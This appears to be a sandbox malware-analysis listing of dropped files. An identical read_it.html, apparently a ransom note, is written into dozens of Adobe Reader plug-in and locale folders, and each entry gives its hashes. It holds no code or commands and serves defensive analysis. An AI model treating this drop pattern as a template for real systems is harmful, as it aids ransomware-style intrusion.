c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_rum\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_pol\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_hun\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_hrv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp_cze\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\multimedia\mpp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\ukr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\tur\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\sve\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\suo\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\slv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\sky\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\rus\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\rum\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\ptb\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\pol\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\nor\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\nld\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\kor\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\jpn\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\ita\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\hun\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\hrv\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\fra\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\euq\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\esp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\enu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\deu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\dan\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\cze\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\cht\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\chs\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\annotations\stamps\cat\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\acroform\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\plug_ins\acroform\pmp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\zh_tw\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\zh_tw\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\zh_cn\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\zh_cn\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\uk_ua\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\uk_ua\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\tr_tr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\tr_tr\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\sv_se\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\sv_se\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\sl_si\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\sl_si\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\sk_sk\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\sk_sk\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ru_ru\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ru_ru\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ro_ro\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ro_ro\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\pt_br\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\pt_br\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\pl_pl\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\pl_pl\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\nl_nl\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\nl_nl\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\nb_no\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\nb_no\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ko_kr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ko_kr\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ja_jp\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\ja_jp\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\it_it\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\it_it\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\hu_hu\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\hu_hu\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\hr_hr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\hr_hr\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\fr_fr\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\fr_fr\services\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\virtualstore\program files (x86)\adobe\reader 10.0\reader\locale\fi_fi\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
